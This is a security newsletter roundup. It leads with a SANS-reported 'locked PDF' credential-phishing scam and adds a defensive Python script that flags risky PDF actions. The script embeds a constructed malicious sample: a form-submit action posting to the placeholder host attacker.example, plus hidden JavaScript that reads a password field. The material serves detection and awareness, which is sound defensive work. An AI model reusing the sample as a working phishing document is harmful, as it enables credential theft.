PDF phishing scam and other security headlines

Scam Of The Week: Locked PDF Phishing Attack

The SANS Internet Storm Center has warned about an active phishing campaign that uses malicious PDF attachments in a new scam to steal email credentials.

The SANS bulletin said that the email has the subject line “Assessment document” and the body contains a single PDF attachment that claims to be locked. The PDF displays the message: “PDF Secure File UNLOCK to Access File Content.”

John Bambenek, handler at the SANS Internet Storm Center, said: “This is an untargeted phishing campaign. They are not going after the most sophisticated users. They are going after Joe Cubicle that may not think twice about entering credentials to unlock a PDF.”

This is a large spray-and-pray campaign that hopes to get a small foothold in your organisation via a single email account, and then use that mailbox to compromise further accounts, tunnel in, or send spear-phishing attacks that arrive from a trusted internal sender. Here is how it looks:

The email claims it’s from VetMeds and the PDF is identified as a VetMeds assessment. Once opened, the contents of the one-page PDF indicate that the document is a SWIFT (Society for Worldwide Interbank Financial Telecommunication) banking transaction.

“It doesn’t matter what email address or password you input into the fake unlocking mechanism. The document is opened and anything you input is transmitted to the spammer,” Bambenek said.

On workstations that open PDFs in Adobe Reader, a security warning dialog is shown before the document is allowed to make its outbound connection. The Adobe message reads: “The document is trying to connect to… If you trust the site, choose Allow. If you do not trust the site, choose Block.”

However, Bambenek points out that Windows 10 opens PDFs in the Edge browser by default, and when Edge opens the VetMeds PDF no such warning is presented to the user, so nothing stands between the user and the credential-harvesting page except their own judgement.
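As an added example (not code from the KnowBe4 post, from SANS, or from any product they name), the following Python triage script shows what “the document is trying to connect to…” looks like at the file level. It scans a PDF for the action keys that let a document auto-run on open, execute JavaScript, submit form fields or open a URL, inflates FlateDecode streams so keys hidden in compressed objects are also seen, and pulls out the destination hosts. Both PDFs in the block are constructed for this example, and the hostname attacker.example is a placeholder, not an indicator from the campaign.

```python
import re
import zlib
from urllib.parse import urlparse

# PDF name keys that give a document the ability to act on open, run code,
# or talk to the outside world. A "locked PDF" credential phish needs at least
# one of /SubmitForm, /URI or /JS to move the typed password off the machine.
SUSPICIOUS_KEYS = {
    b"/OpenAction": "action runs automatically when the document is opened",
    b"/AA": "additional-actions dictionary (page/field event triggers)",
    b"/JavaScript": "embedded JavaScript",
    b"/JS": "embedded JavaScript",
    b"/Launch": "launches an external program",
    b"/SubmitForm": "posts form field values (e.g. a typed password) to a URL",
    b"/URI": "opens an external URL",
    b"/EmbeddedFile": "carries an embedded file",
}
ACTIVE_KEYS = {"/SubmitForm", "/Launch", "/JavaScript", "/JS"}

# Constructed sample (not a real campaign artefact): a one-page PDF whose "UNLOCK"
# link posts form data to a hypothetical attacker host, whose open action opens a
# URL, and whose FlateDecode stream hides a JavaScript action that reads a field.
_HIDDEN = zlib.compress(b"<< /S /JavaScript /JS (this.getField('pw').value) >>")
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj\n"
    b"4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 100 20]\n"
    b"  /A << /S /SubmitForm /F (http://attacker.example/collect.php) /Flags 4 >> >> endobj\n"
    b"5 0 obj << /S /URI /URI (http://attacker.example/unlock) >> endobj\n"
    b"6 0 obj << /Filter /FlateDecode /Length " + str(len(_HIDDEN)).encode() + b" >>\n"
    b"stream\n" + _HIDDEN + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Constructed benign control: same skeleton, no actions, no links.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


def inflate_streams(data: bytes) -> bytes:
    """Return the file bytes plus the inflated content of every FlateDecode stream,
    so keywords hidden inside compressed objects are visible to the keyword scan.
    Assumption: only FlateDecode is handled; other filters are left as-is."""
    parts = [data]
    for m in re.finditer(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", data, re.DOTALL):
        try:
            # decompressobj tolerates a stray trailing byte better than zlib.decompress
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate (or corrupt): the raw bytes are still scanned below
    return b"\n".join(parts)


def extract_urls(blob: bytes) -> list[str]:
    """URLs given as literal-string operands of /URI or of /F (the SubmitForm target).
    Hex strings <...> and name-escaped keys (/#55RI) are not decoded here."""
    found = re.findall(rb"/(?:URI|F)\s*\((https?://[^)\s]+)\)", blob)
    return sorted({u.decode("latin-1") for u in found})


def scan_pdf(data: bytes) -> dict:
    """Keyword triage of one PDF: which risky keys it carries, where it wants to
    connect, and a coarse verdict. This is triage, not a PDF parser."""
    blob = inflate_streams(data)
    findings = {}
    for key, why in SUSPICIOUS_KEYS.items():
        # negative lookahead stops /JS from matching inside /JavaScript-like names
        hits = len(re.findall(re.escape(key) + rb"(?![A-Za-z])", blob))
        if hits:
            findings[key.decode()] = (hits, why)
    urls = extract_urls(blob)
    hosts = sorted({urlparse(u).hostname for u in urls})
    verdict = "suspicious" if urls or ACTIVE_KEYS.intersection(findings) else "clean"
    return {"findings": findings, "urls": urls, "hosts": hosts, "verdict": verdict}


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        result = scan_pdf(doc)
        print(f"{name}: {result['verdict']}; hosts={result['hosts']}")
        for key, (count, why) in result["findings"].items():
            print(f"  {key} x{count}: {why}")
```

Run it as a script and the sample is flagged as suspicious with attacker.example as the only destination, while the control comes back clean. A keyword scan is a first pass, not a verdict: attackers hide keys with name escapes, hex strings and object streams, and a legitimate form can carry /SubmitForm too, so treat a hit as a reason to detonate or hand the file to a proper tool such as Didier Stevens’ pdfid and pdf-parser. On the prevention side, Adobe Reader’s Trust Manager preferences can block PDF access to all web sites outright, which removes the Allow button this scam relies on.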

Read full article: https://blog.knowbe4.com/scam-of-the-week-locked-pdf-phishing-attack

Security Headlines

HealthcareinfoSecurity – Analysis: 2016 Health Data Breaches, and What’s Ahead

“Hacking is just getting rolling in healthcare, or probably more accurately, just beginning to be recognized more often,” says Mac McMillan, CEO of the security consulting firm CynergisTek.

Experts say the healthcare sector should be prepared for more ransomware attacks and other types of extortion attempts in 2017, as well as an uptick in distributed denial-of-service assaults and security breaches involving internet of things devices.


BankinfoSecurity – Linux KillDisk Ransomware Can’t Decrypt

Disk-wiping malware known as KillDisk, which has previously been used in hack attacks tied to espionage operations, has been given an update. The malware now runs on Linux as well as Windows systems, and it also encrypts files, demands a bitcoin ransom and leaves Linux systems unbootable. The headline refers to ESET’s finding that the Linux variant neither saves nor transmits the encryption key, so paying the ransom cannot recover the files.


KrebsOnSecurity – Stolen Passwords Fuel Cardless ATM Fraud

Some financial institutions are now offering so-called “cardless ATM” transactions that allow customers to withdraw cash using nothing more than their mobile phones. But as Krebs’ story illustrates, this new technology also creates an avenue for thieves to quickly and quietly convert stolen customer bank account usernames and passwords into cold hard cash. Worse still, fraudulent cardless ATM withdrawals may prove more difficult for customers to dispute because they place the victim at the scene of the crime.


Bloomberg – Verizon wobbles over Yahoo deal

More bad news for Yahoo to start the new year after it revealed the biggest data breach in history last month: the planned acquisition of the company by Verizon, agreed last year, now looks uncertain.


Vendor Information

Sophos – XG Firewall Home Edition

Our Free Home Use XG Firewall is a fully equipped software version of the Sophos XG firewall, available at no cost for home users – no strings attached. It provides full protection for your home network, including anti-malware, web security and URL filtering, application control, IPS, traffic shaping, VPN, reporting and monitoring, and much more.


Microsoft – Rumors of Cmd’s death have been greatly exaggerated (thanks to Bill Bryant for the story)

This post is in response to a story published on December 6th 2016 by ComputerWorld titled “Say goodbye to the MS-DOS command prompt” and its follow-up article “Follow-up: MS-DOS lives on after all”.

These “stories” were subsequently picked up by Business Insider and Life Hacker among others and fueled a number of concerned Tweets some of which I responded to directly, along with much discussion on Reddit, Hacker News, and elsewhere. It also resulted in several customers/partners sending me concerned emails asking if this “news” was true.


Security Bulletins from the FBI and DHS

FBI – Cyberstalking – Woman Sentenced for Harassing Victim on Social Media

The messages were relentless. A California woman couldn’t escape the barrage of malicious texts, phone calls, and social media posts originating from a mysterious individual with whom she had no previous connection.

The harassment didn’t stop until the FBI intervened and uncovered a trail of threats and extortion that led to a Miami college student—who is now behind bars for cyberstalking.

“An unwanted relationship was being pushed on a victim who ultimately felt terrorized by an obsessed individual she didn’t even know,” said Assistant U.S. Attorney Jodi Anton, who supported the FBI during the investigation. “The constant intimidation was destroying her life, to the point where she could barely function at work and considered suicide.”


DHS – GRIZZLY STEPPE – Russian Malicious Cyber Activity

This Joint Analysis Report (JAR) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This document provides technical details regarding the tools and infrastructure used by the Russian civilian and military intelligence Services (RIS) to compromise and exploit networks and endpoints associated with the U.S. election, as well as a range of U.S. Government, political, and private sector entities. The U.S. Government is referring to this malicious cyber activity by RIS as GRIZZLY STEPPE.

